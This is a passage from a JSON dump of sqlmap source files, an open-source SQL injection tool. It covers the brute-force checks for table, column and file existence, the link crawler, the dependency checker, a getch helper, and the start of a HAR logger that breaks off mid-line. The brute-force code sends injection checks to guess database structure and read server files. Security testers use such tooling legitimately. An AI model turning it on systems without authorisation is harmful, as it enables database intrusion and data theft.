(DBMS.ACCESS,), unique=True)\n    tables.extend(_addPageTextWords())\n    tables = filterListValue(tables, regex)\n\n    for conf.db in (conf.db.split(',') if conf.db else [conf.db]):\n        if conf.db and METADB_SUFFIX not in conf.db:\n            infoMsg = \"checking database '%s'\" % conf.db\n            logger.info(infoMsg)\n\n        threadData = getCurrentThreadData()\n        threadData.shared.count = 0\n        threadData.shared.limit = len(tables)\n        threadData.shared.files = []\n        threadData.shared.unique = set()\n\n        def tableExistsThread():\n            threadData = getCurrentThreadData()\n\n            while kb.threadContinue:\n                kb.locks.count.acquire()\n                if threadData.shared.count < threadData.shared.limit:\n                    table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True)\n                    threadData.shared.count += 1\n                    kb.locks.count.release()\n                else:\n                    kb.locks.count.release()\n                    break\n\n                if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):\n                    fullTableName = \"%s.%s\" % (conf.db, table)\n                else:\n                    fullTableName = table\n\n                if Backend.isDbms(DBMS.MCKOI):\n                    _ = randomInt(1)\n                    result = inject.checkBooleanExpression(\"%s\" % safeStringFormat(\"%d=(SELECT %d FROM %s)\", (_, _, fullTableName)))\n                else:\n                    result = inject.checkBooleanExpression(\"%s\" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName)))\n\n                kb.locks.io.acquire()\n\n                if result and table.lower() not in threadData.shared.unique:\n                    threadData.shared.files.append(table)\n                    threadData.shared.unique.add(table.lower())\n\n                    if conf.verbose in (1, 2) and not conf.api:\n                        clearConsoleLine(True)\n                        infoMsg = \"[%s] [INFO] retrieved: %s\\n\" % (time.strftime(\"%X\"), unsafeSQLIdentificatorNaming(table))\n                        dataToStdout(infoMsg, True)\n\n                if conf.verbose in (1, 2):\n                    status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))\n                    dataToStdout(\"\\r[%s] [INFO] tried %s\" % (time.strftime(\"%X\"), status), True)\n\n                kb.locks.io.release()\n\n        try:\n            runThreads(conf.threads, tableExistsThread, threadChoice=True)\n        except KeyboardInterrupt:\n            warnMsg = \"user aborted during table existence \"\n            warnMsg += \"check. sqlmap will display partial output\"\n            logger.warning(warnMsg)\n\n        clearConsoleLine(True)\n        dataToStdout(\"\\n\")\n\n        if not threadData.shared.files:\n            warnMsg = \"no table(s) found\"\n            if conf.db:\n                warnMsg += \" for database '%s'\" % conf.db\n            logger.warning(warnMsg)\n        else:\n            for item in threadData.shared.files:\n                if conf.db not in kb.data.cachedTables:\n                    kb.data.cachedTables[conf.db] = [item]\n                else:\n                    kb.data.cachedTables[conf.db].append(item)\n\n        for _ in ((conf.db, item) for item in threadData.shared.files):\n            if _ not in kb.brute.tables:\n                kb.brute.tables.append(_)\n\n    conf.db = popValue()\n    hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True)\n\n    return kb.data.cachedTables\n\ndef columnExists(columnFile, regex=None):\n    if kb.choices.columnExists is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct:\n        warnMsg = \"it's not recommended to use '%s' and/or '%s' \" % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED])\n        warnMsg += \"for common column existence check\"\n        logger.warning(warnMsg)\n\n        message = \"are you sure you want to continue? [y/N] \"\n        kb.choices.columnExists = readInput(message, default='N', boolean=True)\n\n        if not kb.choices.columnExists:\n            return None\n\n    if not conf.tbl:\n        errMsg = \"missing table parameter\"\n        raise SqlmapMissingMandatoryOptionException(errMsg)\n\n    if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:\n        conf.db = conf.db.upper()\n\n    result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr())))\n\n    if result:\n        errMsg = \"can't use column existence check because of detected invalid results \"\n        errMsg += \"(most likely caused by inability of the used injection \"\n        errMsg += \"to distinguish erroneous results)\"\n        raise SqlmapDataException(errMsg)\n\n    message = \"which common columns (wordlist) file do you want to use?\\n\"\n    message += \"[1] default '%s' (press Enter)\\n\" % columnFile\n    message += \"[2] custom\"\n    choice = readInput(message, default='1')\n\n    if choice == '2':\n        message = \"what's the custom common columns file location?\\n\"\n        columnFile = readInput(message) or columnFile\n\n    infoMsg = \"checking column existence using items from '%s'\" % columnFile\n    logger.info(infoMsg)\n\n    columns = getFileItems(columnFile, unique=True)\n    columns.extend(_addPageTextWords())\n    columns = filterListValue(columns, regex)\n\n    table = safeSQLIdentificatorNaming(conf.tbl, True)\n\n    if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):\n        table = \"%s.%s\" % (safeSQLIdentificatorNaming(conf.db), table)\n\n    kb.threadContinue = True\n    kb.bruteMode = True\n\n    threadData = getCurrentThreadData()\n    threadData.shared.count = 0\n    threadData.shared.limit = len(columns)\n    threadData.shared.files = []\n\n    def columnExistsThread():\n        threadData = getCurrentThreadData()\n\n        while kb.threadContinue:\n            kb.locks.count.acquire()\n            if threadData.shared.count < threadData.shared.limit:\n                column = safeSQLIdentificatorNaming(columns[threadData.shared.count])\n                threadData.shared.count += 1\n                kb.locks.count.release()\n            else:\n                kb.locks.count.release()\n                break\n\n            if Backend.isDbms(DBMS.MCKOI):\n                result = inject.checkBooleanExpression(safeStringFormat(\"0<(SELECT COUNT(%s) FROM %s)\", (column, table)))\n            else:\n                result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table)))\n\n            kb.locks.io.acquire()\n\n            if result:\n                threadData.shared.files.append(column)\n\n                if conf.verbose in (1, 2) and not conf.api:\n                    clearConsoleLine(True)\n                    infoMsg = \"[%s] [INFO] retrieved: %s\\n\" % (time.strftime(\"%X\"), unsafeSQLIdentificatorNaming(column))\n                    dataToStdout(infoMsg, True)\n\n            if conf.verbose in (1, 2):\n                status = \"%d/%d items (%d%%)\" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))\n                dataToStdout(\"\\r[%s] [INFO] tried %s\" % (time.strftime(\"%X\"), status), True)\n\n            kb.locks.io.release()\n\n    try:\n        runThreads(conf.threads, columnExistsThread, threadChoice=True)\n    except KeyboardInterrupt:\n        warnMsg = \"user aborted during column existence \"\n        warnMsg += \"check. sqlmap will display partial output\"\n        logger.warning(warnMsg)\n    finally:\n        kb.bruteMode = False\n\n    clearConsoleLine(True)\n    dataToStdout(\"\\n\")\n\n    if not threadData.shared.files:\n        warnMsg = \"no column(s) found\"\n        logger.warning(warnMsg)\n    else:\n        columns = {}\n\n        for column in threadData.shared.files:\n            if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):\n                result = not inject.checkBooleanExpression(\"%s\" % safeStringFormat(\"EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')\", (column, table, column)))\n            elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,):\n                result = inject.checkBooleanExpression(\"%s\" % safeStringFormat(\"EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')\", (column, table, column)))\n            elif Backend.getIdentifiedDbms() in (DBMS.MCKOI,):\n                result = inject.checkBooleanExpression(\"%s\" % safeStringFormat(\"0=(SELECT MAX(%s)-MAX(%s) FROM %s)\", (column, column, table)))\n            else:\n                result = inject.checkBooleanExpression(\"%s\" % safeStringFormat(\"EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))\", (column, table, column, column)))\n\n            if result:\n                columns[column] = \"numeric\"\n            else:\n                columns[column] = \"non-numeric\"\n\n        kb.data.cachedColumns[conf.db] = {conf.tbl: columns}\n\n        for _ in ((conf.db, conf.tbl, item[0], item[1]) for item in columns.items()):\n            if _ not in kb.brute.columns:\n                kb.brute.columns.append(_)\n\n        hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True)\n\n    return kb.data.cachedColumns\n\n@stackedmethod\ndef fileExists(pathFile):\n    retVal = []\n\n    message = \"which common files file do you want to use?\\n\"\n    message += \"[1] default '%s' (press Enter)\\n\" % pathFile\n    message += \"[2] custom\"\n    choice = readInput(message, default='1')\n\n    if choice == '2':\n        message = \"what's the custom common files file location?\\n\"\n        pathFile = readInput(message) or pathFile\n\n    infoMsg = \"checking files existence using items from '%s'\" % pathFile\n    logger.info(infoMsg)\n\n    paths = getFileItems(pathFile, unique=True)\n\n    kb.bruteMode = True\n\n    try:\n        conf.dbmsHandler.readFile(randomStr())\n    except SqlmapNoneDataException:\n        pass\n    except:\n        kb.bruteMode = False\n        raise\n\n    threadData = getCurrentThreadData()\n    threadData.shared.count = 0\n    threadData.shared.limit = len(paths)\n    threadData.shared.files = []\n\n    def fileExistsThread():\n        threadData = getCurrentThreadData()\n\n        while kb.threadContinue:\n            kb.locks.count.acquire()\n            if threadData.shared.count < threadData.shared.limit:\n                path = ntToPosixSlashes(paths[threadData.shared.count])\n                threadData.shared.count += 1\n                kb.locks.count.release()\n            else:\n                kb.locks.count.release()\n                break\n\n            try:\n                result = unArrayizeValue(conf.dbmsHandler.readFile(path))\n            except SqlmapNoneDataException:\n                result = None\n\n            kb.locks.io.acquire()\n\n            if not isNoneValue(result):\n                threadData.shared.files.append(result)\n\n                if not conf.api:\n                    clearConsoleLine(True)\n                    infoMsg = \"[%s] [INFO] retrieved: '%s'\\n\" % (time.strftime(\"%X\"), path)\n                    dataToStdout(infoMsg, True)\n\n            if conf.verbose in (1, 2):\n                status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))\n                dataToStdout(\"\\r[%s] [INFO] tried %s\" % (time.strftime(\"%X\"), status), True)\n\n            kb.locks.io.release()\n\n    try:\n        pushValue(logger.getEffectiveLevel())\n        logger.setLevel(logging.CRITICAL)\n\n        runThreads(conf.threads, fileExistsThread, threadChoice=True)\n    except KeyboardInterrupt:\n        warnMsg = \"user aborted during file existence \"\n        warnMsg += \"check. sqlmap will display partial output\"\n        logger.warning(warnMsg)\n    finally:\n        kb.bruteMode = False\n        logger.setLevel(popValue())\n\n    clearConsoleLine(True)\n    dataToStdout(\"\\n\")\n\n    if not threadData.shared.files:\n        warnMsg = \"no file(s) found\"\n        logger.warning(warnMsg)\n    else:\n        retVal = threadData.shared.files\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/lib/utils/crawler.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import division\n\nimport os\nimport re\nimport tempfile\nimport time\n\nfrom lib.core.common import checkSameHost\nfrom lib.core.common import clearConsoleLine\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import findPageForms\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import openFile\nfrom lib.core.common import readInput\nfrom lib.core.common import safeCSValue\nfrom lib.core.common import urldecode\nfrom lib.core.compat import xrange\nfrom lib.core.convert import htmlUnescape\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.datatype import OrderedSet\nfrom lib.core.enums import MKSTEMP_PREFIX\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapSyntaxException\nfrom lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.core.threads import runThreads\nfrom lib.parse.sitemap import parseSitemap\nfrom lib.request.connect import Connect as Request\nfrom thirdparty import six\nfrom thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup\nfrom thirdparty.six.moves import http_client as _http_client\nfrom thirdparty.six.moves import urllib as _urllib\n\ndef crawl(target, post=None, cookie=None):\n    if not target:\n        return\n\n    try:\n        visited = set()\n        threadData = getCurrentThreadData()\n        threadData.shared.value = OrderedSet()\n        threadData.shared.formsFound = False\n\n        def crawlThread():\n            threadData = getCurrentThreadData()\n\n            while kb.threadContinue:\n                with kb.locks.limit:\n                    if threadData.shared.unprocessed:\n                        current = threadData.shared.unprocessed.pop()\n                        if current in visited:\n                            continue\n                        elif conf.crawlExclude and re.search(conf.crawlExclude, current):\n                            dbgMsg = \"skipping '%s'\" % current\n                            logger.debug(dbgMsg)\n                            continue\n                        else:\n                            visited.add(current)\n                    else:\n                        break\n\n                content = None\n                try:\n                    if current:\n                        content = Request.getPage(url=current, post=post, cookie=None, crawling=True, raise404=False)[0]\n                except SqlmapConnectionException as ex:\n                    errMsg = \"connection exception detected ('%s'). skipping \" % getSafeExString(ex)\n                    errMsg += \"URL '%s'\" % current\n                    logger.critical(errMsg)\n                except SqlmapSyntaxException:\n                    errMsg = \"invalid URL detected. skipping '%s'\" % current\n                    logger.critical(errMsg)\n                except _http_client.InvalidURL as ex:\n                    errMsg = \"invalid URL detected ('%s'). skipping \" % getSafeExString(ex)\n                    errMsg += \"URL '%s'\" % current\n                    logger.critical(errMsg)\n\n                if not kb.threadContinue:\n                    break\n\n                if isinstance(content, six.text_type):\n                    try:\n                        match = re.search(r\"(?si)<html[^>]*>(.+)</html>\", content)\n                        if match:\n                            content = \"<html>%s</html>\" % match.group(1)\n\n                        soup = BeautifulSoup(content)\n                        tags = soup('a')\n\n                        tags += re.finditer(r'(?i)\\s(href|src)=[\"\\'](?P<href>[^>\"\\']+)', content)\n                        tags += re.finditer(r'(?i)window\\.open\\([\"\\'](?P<href>[^)\"\\']+)[\"\\']', content)\n\n                        for tag in tags:\n                            href = tag.get(\"href\") if hasattr(tag, \"get\") else tag.group(\"href\")\n\n                            if href:\n                                if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:\n                                    current = threadData.lastRedirectURL[1]\n                                url = _urllib.parse.urljoin(current, htmlUnescape(href))\n\n                                # flag to know if we are dealing with the same target host\n                                _ = checkSameHost(url, target)\n\n                                if conf.scope:\n                                    if not re.search(conf.scope, url, re.I):\n                                        continue\n                                elif not _:\n                                    continue\n\n                                if (extractRegexResult(r\"\\A[^?]+\\.(?P<result>\\w+)(\\?|\\Z)\", url) or \"\").lower() not in CRAWL_EXCLUDE_EXTENSIONS:\n                                    with kb.locks.value:\n                                        threadData.shared.deeper.add(url)\n                                        if re.search(r\"(.*?)\\?(.+)\", url) and not re.search(r\"\\?(v=)?\\d+\\Z\", url) and not re.search(r\"(?i)\\.(js|css)(\\?|\\Z)\", url):\n                                            threadData.shared.value.add(url)\n                    except UnicodeEncodeError:  # for non-HTML files\n                        pass\n                    except ValueError:          # for non-valid links\n                        pass\n                    except AssertionError:      # for invalid HTML\n                        pass\n                    finally:\n                        if conf.forms:\n                            threadData.shared.formsFound |= len(findPageForms(content, current, False, True)) > 0\n\n                if conf.verbose in (1, 2):\n                    threadData.shared.count += 1\n                    status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length))\n                    dataToStdout(\"\\r[%s] [INFO] %s\" % (time.strftime(\"%X\"), status), True)\n\n        threadData.shared.deeper = set()\n        threadData.shared.unprocessed = set([target])\n\n        _ = re.sub(r\"(?<!/)/(?!/).*\", \"\", target)\n        if _:\n            if target.strip('/') != _.strip('/'):\n                threadData.shared.unprocessed.add(_)\n\n        if re.search(r\"\\?.*\\b\\w+=\", target):\n            threadData.shared.value.add(target)\n\n        if kb.checkSitemap is None:\n            message = \"do you want to check for the existence of \"\n            message += \"site's sitemap(.xml) [y/N] \"\n            kb.checkSitemap = readInput(message, default='N', boolean=True)\n\n        if kb.checkSitemap:\n            found = True\n            items = None\n            url = _urllib.parse.urljoin(target, \"/sitemap.xml\")\n            try:\n                items = parseSitemap(url)\n            except SqlmapConnectionException as ex:\n                if \"page not found\" in getSafeExString(ex):\n                    found = False\n                    logger.warning(\"'sitemap.xml' not found\")\n            except:\n                pass\n            finally:\n                if found:\n                    if items:\n                        for item in items:\n                            if re.search(r\"(.*?)\\?(.+)\", item):\n                                threadData.shared.value.add(item)\n                        if conf.crawlDepth > 1:\n                            threadData.shared.unprocessed.update(items)\n                    logger.info(\"%s links found\" % (\"no\" if not items else len(items)))\n\n        if not conf.bulkFile:\n            infoMsg = \"starting crawler for target URL '%s'\" % target\n            logger.info(infoMsg)\n\n        for i in xrange(conf.crawlDepth):\n            threadData.shared.count = 0\n            threadData.shared.length = len(threadData.shared.unprocessed)\n            numThreads = min(conf.threads, len(threadData.shared.unprocessed))\n\n            if not conf.bulkFile:\n                logger.info(\"searching for links with depth %d\" % (i + 1))\n\n            runThreads(numThreads, crawlThread, threadChoice=(i > 0))\n            clearConsoleLine(True)\n\n            if threadData.shared.deeper:\n                threadData.shared.unprocessed = set(threadData.shared.deeper)\n            else:\n                break\n\n    except KeyboardInterrupt:\n        warnMsg = \"user aborted during crawling. sqlmap \"\n        warnMsg += \"will use partial list\"\n        logger.warning(warnMsg)\n\n    finally:\n        clearConsoleLine(True)\n\n        if not threadData.shared.value:\n            if not (conf.forms and threadData.shared.formsFound):\n                warnMsg = \"no usable links found (with GET parameters)\"\n                if conf.forms:\n                    warnMsg += \" or forms\"\n                logger.warning(warnMsg)\n        else:\n            for url in threadData.shared.value:\n                kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None))\n\n        if kb.targets:\n            if kb.normalizeCrawlingChoice is None:\n                message = \"do you want to normalize \"\n                message += \"crawling results [Y/n] \"\n\n                kb.normalizeCrawlingChoice = readInput(message, default='Y', boolean=True)\n\n            if kb.normalizeCrawlingChoice:\n                seen = set()\n                results = OrderedSet()\n\n                for target in kb.targets:\n                    value = \"%s%s%s\" % (target[0], '&' if '?' in target[0] else '?', target[2] or \"\")\n                    match = re.search(r\"/[^/?]*\\?.+\\Z\", value)\n                    if match:\n                        key = re.sub(r\"=[^=&]*\", \"=\", match.group(0)).strip(\"&?\")\n                        if '=' in key and key not in seen:\n                            results.add(target)\n                            seen.add(key)\n\n                kb.targets = results\n\n            storeResultsToFile(kb.targets)\n\ndef storeResultsToFile(results):\n    if not results:\n        return\n\n    if kb.storeCrawlingChoice is None:\n        message = \"do you want to store crawling results to a temporary file \"\n        message += \"for eventual further processing with other tools [y/N] \"\n\n        kb.storeCrawlingChoice = readInput(message, default='N', boolean=True)\n\n    if kb.storeCrawlingChoice:\n        handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CRAWLER, suffix=\".csv\" if conf.forms else \".txt\")\n        os.close(handle)\n\n        infoMsg = \"writing crawling results to a temporary file '%s' \" % filename\n        logger.info(infoMsg)\n\n        with openFile(filename, \"w+b\") as f:\n            if conf.forms:\n                f.write(\"URL,POST\\n\")\n\n            for url, _, data, _, _ in results:\n                if conf.forms:\n                    f.write(\"%s,%s\\n\" % (safeCSValue(url), safeCSValue(data or \"\")))\n                else:\n                    f.write(\"%s\\n\" % url)\n"
  },
  {
    "path": "sqlmap/lib/utils/deps.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom lib.core.dicts import DBMS_DICT\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import IS_WIN\n\ndef checkDependencies():\n    missing_libraries = set()\n\n    for dbmsName, data in DBMS_DICT.items():\n        if data[1] is None:\n            continue\n\n        try:\n            if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):\n                __import__(\"_mssql\")\n\n                pymssql = __import__(\"pymssql\")\n                if not hasattr(pymssql, \"__version__\") or pymssql.__version__ < \"1.0.2\":\n                    warnMsg = \"'%s' third-party library must be \" % data[1]\n                    warnMsg += \"version >= 1.0.2 to work properly. \"\n                    warnMsg += \"Download from '%s'\" % data[2]\n                    logger.warning(warnMsg)\n            elif dbmsName == DBMS.MYSQL:\n                __import__(\"pymysql\")\n            elif dbmsName in (DBMS.PGSQL, DBMS.CRATEDB):\n                __import__(\"psycopg2\")\n            elif dbmsName == DBMS.ORACLE:\n                __import__(\"cx_Oracle\")\n            elif dbmsName == DBMS.SQLITE:\n                __import__(\"sqlite3\")\n            elif dbmsName == DBMS.ACCESS:\n                __import__(\"pyodbc\")\n            elif dbmsName == DBMS.FIREBIRD:\n                __import__(\"kinterbasdb\")\n            elif dbmsName == DBMS.DB2:\n                __import__(\"ibm_db_dbi\")\n            elif dbmsName in (DBMS.HSQLDB, DBMS.CACHE):\n                __import__(\"jaydebeapi\")\n                __import__(\"jpype\")\n            elif dbmsName == DBMS.INFORMIX:\n                __import__(\"ibm_db_dbi\")\n            elif dbmsName == DBMS.MONETDB:\n                __import__(\"pymonetdb\")\n            elif dbmsName == DBMS.DERBY:\n                __import__(\"drda\")\n            elif dbmsName == DBMS.VERTICA:\n                __import__(\"vertica_python\")\n            elif dbmsName == DBMS.PRESTO:\n                __import__(\"prestodb\")\n            elif dbmsName == DBMS.MIMERSQL:\n                __import__(\"mimerpy\")\n            elif dbmsName == DBMS.CUBRID:\n                __import__(\"CUBRIDdb\")\n        except:\n            warnMsg = \"sqlmap requires '%s' third-party library \" % data[1]\n            warnMsg += \"in order to directly connect to the DBMS \"\n            warnMsg += \"'%s'. Download from '%s'\" % (dbmsName, data[2])\n            logger.warning(warnMsg)\n            missing_libraries.add(data[1])\n\n            continue\n\n        debugMsg = \"'%s' third-party library is found\" % data[1]\n        logger.debug(debugMsg)\n\n    try:\n        __import__(\"impacket\")\n        debugMsg = \"'python-impacket' third-party library is found\"\n        logger.debug(debugMsg)\n    except ImportError:\n        warnMsg = \"sqlmap requires 'python-impacket' third-party library for \"\n        warnMsg += \"out-of-band takeover feature. Download from \"\n        warnMsg += \"'https://github.com/coresecurity/impacket'\"\n        logger.warning(warnMsg)\n        missing_libraries.add('python-impacket')\n\n    try:\n        __import__(\"ntlm\")\n        debugMsg = \"'python-ntlm' third-party library is found\"\n        logger.debug(debugMsg)\n    except ImportError:\n        warnMsg = \"sqlmap requires 'python-ntlm' third-party library \"\n        warnMsg += \"if you plan to attack a web application behind NTLM \"\n        warnMsg += \"authentication. Download from 'https://github.com/mullender/python-ntlm'\"\n        logger.warning(warnMsg)\n        missing_libraries.add('python-ntlm')\n\n    try:\n        __import__(\"websocket._abnf\")\n        debugMsg = \"'websocket-client' library is found\"\n        logger.debug(debugMsg)\n    except ImportError:\n        warnMsg = \"sqlmap requires 'websocket-client' third-party library \"\n        warnMsg += \"if you plan to attack a web application using WebSocket. \"\n        warnMsg += \"Download from 'https://pypi.python.org/pypi/websocket-client/'\"\n        logger.warning(warnMsg)\n        missing_libraries.add('websocket-client')\n\n    try:\n        __import__(\"tkinter\")\n        debugMsg = \"'tkinter' library is found\"\n        logger.debug(debugMsg)\n    except ImportError:\n        warnMsg = \"sqlmap requires 'tkinter' library \"\n        warnMsg += \"if you plan to run a GUI\"\n        logger.warning(warnMsg)\n        missing_libraries.add('tkinter')\n\n    try:\n        __import__(\"tkinter.ttk\")\n        debugMsg = \"'tkinter.ttk' library is found\"\n        logger.debug(debugMsg)\n    except ImportError:\n        warnMsg = \"sqlmap requires 'tkinter.ttk' library \"\n        warnMsg += \"if you plan to run a GUI\"\n        logger.warning(warnMsg)\n        missing_libraries.add('tkinter.ttk')\n\n    if IS_WIN:\n        try:\n            __import__(\"pyreadline\")\n            debugMsg = \"'python-pyreadline' third-party library is found\"\n            logger.debug(debugMsg)\n        except ImportError:\n            warnMsg = \"sqlmap requires 'pyreadline' third-party library to \"\n            warnMsg += \"be able to take advantage of the sqlmap TAB \"\n            warnMsg += \"completion and history support features in the SQL \"\n            warnMsg += \"shell and OS shell. Download from \"\n            warnMsg += \"'https://pypi.org/project/pyreadline/'\"\n            logger.warning(warnMsg)\n            missing_libraries.add('python-pyreadline')\n\n    if len(missing_libraries) == 0:\n        infoMsg = \"all dependencies are installed\"\n        logger.info(infoMsg)\n"
  },
  {
    "path": "sqlmap/lib/utils/getch.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nclass _Getch(object):\n    \"\"\"\n    Gets a single character from standard input.  Does not echo to\n    the screen (reference: http://code.activestate.com/recipes/134892/)\n    \"\"\"\n    def __init__(self):\n        try:\n            self.impl = _GetchWindows()\n        except ImportError:\n            try:\n                self.impl = _GetchMacCarbon()\n            except(AttributeError, ImportError):\n                self.impl = _GetchUnix()\n\n    def __call__(self):\n        return self.impl()\n\nclass _GetchUnix(object):\n    def __init__(self):\n        __import__(\"tty\")\n\n    def __call__(self):\n        import sys\n        import termios\n        import tty\n\n        fd = sys.stdin.fileno()\n        old_settings = termios.tcgetattr(fd)\n        try:\n            tty.setraw(sys.stdin.fileno())\n            ch = sys.stdin.read(1)\n        finally:\n            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n        return ch\n\nclass _GetchWindows(object):\n    def __init__(self):\n        __import__(\"msvcrt\")\n\n    def __call__(self):\n        import msvcrt\n        return msvcrt.getch()\n\nclass _GetchMacCarbon(object):\n    \"\"\"\n    A function which returns the current ASCII key that is down;\n    if no ASCII key is down, the null string is returned.  The\n    page http://www.mactech.com/macintosh-c/chap02-1.html was\n    very helpful in figuring out how to do this.\n    \"\"\"\n    def __init__(self):\n        import Carbon\n\n        getattr(Carbon, \"Evt\")  # see if it has this (in Unix, it doesn't)\n\n    def __call__(self):\n        import Carbon\n\n        if Carbon.Evt.EventAvail(0x0008)[0] == 0:  # 0x0008 is the keyDownMask\n            return ''\n        else:\n            #\n            # The event contains the following info:\n            # (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1]\n            #\n            # The message (msg) contains the ASCII char which is\n            # extracted with the 0x000000FF charCodeMask; this\n            # number is converted to an ASCII character with chr() and\n            # returned\n            #\n            (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1]\n            return chr(msg & 0x000000FF)\n\ngetch = _Getch()\n"
  },
  {
    "path": "sqlmap/lib/utils/har.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport base64\nimport datetime\nimport io\nimport re\nimport time\n\nfrom lib.core.bigarray import BigArray\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getText\nfrom lib.core.settings import VERSION\nfrom thirdparty.six.moves import BaseHTTPServer as _BaseHTTPServer\nfrom thirdparty.six.moves import http_client as _http_client\n\n# Reference: https://dvcs.w3.org/hg/webperf/raw-file/tip/specs/HAR/Overview.html\n#            http://www.softwareishard.com/har/viewer/\n\nclass HTTPCollectorFactory(object):\n    def __init__(self, harFile=False):\n        self.harFile = harFile\n\n    def create(self):\n        return HTTPCollector()\n\nclass HTTPCollector(object):\n    def __init__(self):\n        self.messages = BigArray()\n        self.extendedArguments = {}\n\n    def setExtendedArguments(self, arguments):\n        self.extendedArguments = arguments\n\n    def collectRequest(self, requestMessage, responseMessage, startTime=None, endTime=None):\n        self.messages.append(RawPair(requestMessage, responseMessage,\n                                     startTime=startTime, endTime=endTime,\n                                     extendedArguments=self.extendedArguments))\n\n    def obtain(self):\n        return {\"log\": {\n            \"version\": \"1.2\",\n            \"creator\": {\"name\": \"sqlmap\", \"version\": VERSION},\n            \"entries\": [pair.toEntry().toDict() for pair in self.messages],\n        }}\n\nclass RawPair(object):\n    def __init__(self, request, response, startTime=None, endTime=None, extendedArguments=None):\n        self.request = getBytes(request)\n        self.response = getBytes(response)\n        self.startTime = startTime\n        self.endTime = endTime\n        self.extendedArguments = extendedArguments or {}\n\n    def toEntry(self):\n        return Entry(request=Request.parse(self.request), response=Response.parse(self.response),\n                     startTime=self.startTime, endTime=self.endTime,\n                     extendedArguments=self.extendedArguments)\n\nclass Entry(object):\n    def __init__(self, request, response, startTime, endTime, extendedArguments):\n        self.request = request\n        self.response = response\n        self.startTime = startTime or 0\n        self.endTime = endTime or 0\n        self.extendedArguments = extendedArguments\n\n    def toDict(self):\n        out = {\n            \"request\": self.request.toDict(),\n            \"response\": self.response.toDict(),\n            \"cache\": {},\n            \"timings\": {\n                \"send\": -1,\n                \"wait\": -1,\n                \"receive\": -1,\n            },\n            \"time\": int(1000 * (self.endTime - self.startTime)),\n            \"startedDateTime\": \"%s%s\" % (datetime.datetime.fromtimestamp(self.startTime).isoformat(), time.strftime(\"%z\")) if self.startTime else None\n        }\n        out.update(self.extendedArguments)\n        return out\n\nclass Request(object):\n    def __init__(self, method, path, httpVersion, headers, postBody=None, raw=None, comment=None):\n        self.method = method\n        self.path = path\n        self.httpVersion = httpVersion\n        self.headers = headers or {}\n        self.postBody = postBody\n        self.comment = comment.strip() if comment else comment\n        self.raw = raw\n\n    @classmethod\n    def parse(cls, raw):\n        request = HTTPRequest(raw)\n        return cls(method=request.command,\n                   path=request.path,\n                   httpVersion=request.request_version,\n                   headers=request.headers,\n                   postBody=request.rfile.read(),\n                   comment=request.comment,\n                   raw=raw)\n\n    @property\n    def url(self):\n        host = self.headers.get(\"Host\", \"unknown\")\n        return \"http://%s%s\" % (host, self.path)\n\n    def toDict(self):\n        out = {\n            \"httpVersion\": self.httpVersion,\n            \"method\": self.method,\n            \"url\": self.url,\n            \"headers\": [dict(name=key.capitalize(), value=value) for key, value in 